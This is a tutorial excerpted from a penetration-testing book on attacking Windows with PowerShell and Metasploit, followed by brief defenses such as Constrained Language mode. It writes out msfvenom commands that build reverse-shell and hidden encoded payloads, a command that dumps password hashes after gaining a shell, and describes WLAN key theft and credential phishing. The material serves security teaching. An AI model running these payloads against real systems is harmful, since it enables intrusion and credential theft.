Search icon CANCEL
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Conferences
Free Learning
Arrow right icon

Weaponizing PowerShell with Metasploit and how to defend against PowerShell attacks [Tutorial]

Save for later
  • 4 min read
  • 04 Nov 2018

article-image
PowerShell is a perfect tool for performing sophisticated attacks, and also, can be used side-by-side with the Metasploit Framework.

This article is an excerpt taken from the book Advanced Infrastructure Penetration Testing written by Chiheb Chebbi. In this book, you will learn advanced penetration testing techniques that will help you exploit databases, web and application servers, switches or routers, Docker, VLAN, VoIP, and VPN.

In today's post, we will combine the flexibility of Metasploit and PowerShell. This combination is a great opportunity to perform more customized attacks and security tests.

Interactive PowerShell


PowerShell attacks are already integrated into Metasploit. You can check by using the search command:

msf> search powershell


weaponizing-powershell-with-metasploit-and-how-to-defend-against-powershell-attacks-tutorial-img-0

Now it is time to learn how to use Metasploit with PowerShell. For a demonstration of one of the many uses, you can convert a PowerShell script into an executable file using the msfvenom utility:

>msfvenom    -p    windows/powershell_reverse_tcp LHOST=192.168.1.39    LPORT=4444    -f    exe    >    evilPS.exe

>msfvenom  -p     windows/exec     CMD=“powershell     -ep     bypass     -W     Hidden     -enc   [Powershell script Here]”    -f    exe    -e    x86/shikata_ga_nai    -o   /root/home/ghost/Desktop/power.exe

PowerSploit


PowerSploit is an amazing set of PowerShell scripts used by information security professionals, and especially penetration testers. To download PowerSploit, you need to grab it from its official GitHub repository, https://github.com/PowerShellMafia/PowerSploit:

# git clone https://github.com/PowerShellMafia/PowerSploit   


After cloning the project, use the ls command to list the files:

From the following screenshot, you can note that PowerSploit contains a lot of amazing scripts for performing a number of tasks, such as:

  • AntivirusBypass
  • Exfiltration
  • Persistence
  • PowerSploit
  • PowerUp
  • PowerView


weaponizing-powershell-with-metasploit-and-how-to-defend-against-powershell-attacks-tutorial-img-1

Nishang – PowerShell for penetration testing


Nishang is a great collection of tools used to perform many tasks during all the penetration testing phases. You can get it from https://github.com/samratashok/nishang:

# git clone https://github.com/samratashok/nishang


As you can see from listing the downloaded project, Nishang is loaded with many various scripts and utilities for performing a lot of required tasks during penetration testing missions, such as:

  • Privilege escalation
  • Scanning
  • Pivoting  


You can explore all the available scripts by listing the content of Nishang project using the ls command:

weaponizing-powershell-with-metasploit-and-how-to-defend-against-powershell-attacks-tutorial-img-2

Let's explore some of Nishang's script power on a Windows machine:

weaponizing-powershell-with-metasploit-and-how-to-defend-against-powershell-attacks-tutorial-img-3

You can import all the modules using the Import-Module PowerShell cmdlet:

weaponizing-powershell-with-metasploit-and-how-to-defend-against-powershell-attacks-tutorial-img-4

Oops, something went wrong! Don't worry, in order to use the Import-Module, you need to open PowerShell as an administrator, and type  Set-ExecutionPolicy -ExecutionPolicy RemoteSigned:

weaponizing-powershell-with-metasploit-and-how-to-defend-against-powershell-attacks-tutorial-img-5

Then you can import the modules:

weaponizing-powershell-with-metasploit-and-how-to-defend-against-powershell-attacks-tutorial-img-6

Now, if you want, for example, to use the Get-Information module, you just need to type Get-Information:

weaponizing-powershell-with-metasploit-and-how-to-defend-against-powershell-attacks-tutorial-img-7

If you want  to unveil WLAN keys, type Get-WLAN-Keys:

weaponizing-powershell-with-metasploit-and-how-to-defend-against-powershell-attacks-tutorial-img-8

Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at €18.99/month. Cancel anytime

You can go further and dump password hashes from a target machine in a post-exploitation mission. Thanks to the Get-PassHashes module, you are able to dump password hashes. This is the output of it from my local machine:


weaponizing-powershell-with-metasploit-and-how-to-defend-against-powershell-attacks-tutorial-img-9

However, if you want to pop the command after getting a shell, use:

Powershell.exe –exec bypass –Command “& {Import-Module '[PATH_HERE]/Get-PassHashes.ps1' , Get-PassHashes}”


You can even perform a phishing attack using Invoke-CredentialPhish, like in the previous demonstration. You can run this attack on the victim's machine:

weaponizing-powershell-with-metasploit-and-how-to-defend-against-powershell-attacks-tutorial-img-10

Defending against PowerShell attacks


In the previous sections, we went through various techniques for attacking machines using Metasploit and PowerShell. Now it is time to learn how to defend against and mitigate PowerShell attacks. In order to protect against PowerShell attacks, you need to:

  1. Implement the latest PowerShell version (version 5, when this book was written). To check, type Get-Host:


weaponizing-powershell-with-metasploit-and-how-to-defend-against-powershell-attacks-tutorial-img-11

  1. Monitor PowerShell logs.
  2. Ensure a least-privilege policy and group policies settings. You can edit them with the Local Group Policy Editor. If you are using the Windows 10 Enterprise edition, you can also use AppLocker:


weaponizing-powershell-with-metasploit-and-how-to-defend-against-powershell-attacks-tutorial-img-12

  1. Use the Constrained Language mode:

PS C:Windowssystem32> [environment]::SetEnvironmentVariable('__PSLockdownPolicy', '4', 'Machine')

  1. To check the Constrained Language mode, type:

 $ExecutionContext.SessionState.LanguageMode

  1. That way, malicious scripts won't work:


weaponizing-powershell-with-metasploit-and-how-to-defend-against-powershell-attacks-tutorial-img-13Thus, in this article, we saw the combination of Metasploit and PowerShell to perform more customized attacks and security tests. If you've enjoyed reading this post, and want to learn how to exploit enterprise VLANS, and go from theory to real-world experience, do check out Advanced Infrastructure Penetration Testing.

Pentest tool in focus: Metasploit

Approaching a Penetration Test Using Metasploit

Getting Started with Metasploitable2 and Kali Linux